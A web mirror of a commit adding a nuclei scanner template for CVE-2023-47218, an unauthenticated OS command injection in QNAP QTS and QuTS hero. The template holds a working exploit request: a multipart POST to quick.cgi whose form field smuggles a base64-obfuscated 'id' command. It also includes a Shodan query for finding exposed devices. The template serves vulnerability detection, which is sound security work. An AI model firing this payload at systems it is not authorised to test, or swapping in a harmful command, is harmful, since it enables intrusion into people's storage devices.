daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #9508 from projectdiscovery/CVE-2023-47218 

Create CVE-2023-47218.yaml
patch-1
Dhiyaneshwaran 2024-04-05 12:51:58 +05:30 committed by GitHub
parent 1fc41deba2 d03779f557
commit 1fa58872d7
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 53 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

53
http/cves/2023/CVE-2023-47218.yaml Normal file
View File

@ -0,0 +1,53 @@
id: CVE-2023-47218
info:
name: QNAP QTS and QuTS Hero - OS Command Injection
author: ritikchaddha
severity: high
description: |
An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.
reference:
- https://github.com/passwa11/CVE-2023-47218
- https://twitter.com/win3zz/status/1760224052289888668/photo/3
- https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
- https://nvd.nist.gov/vuln/detail/CVE-2023-47218
classification:
cvss-metrics: CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 8.3
cwe-id: CWE-78
cve-id: CVE-2023-47218
metadata:
verified: true
max-request: 2
shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"
tags: cve,cve2023,qnap,qts,quts,rce,intrusive
variables:
file: '{{rand_base(6)}}'
cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22'
http:
- raw:
- |
POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary="avssqwfz"
--avssqwfz
Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}"
Content-Type: text/plain
skfqduny
--avssqwfz
- |
POST /cgi-bin/quick/{{file}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_1, "code\": 200", "full_path_filename success")'
- 'contains_all(body_2, "uid=", "gid=")'
- 'status_code == 200'
condition: and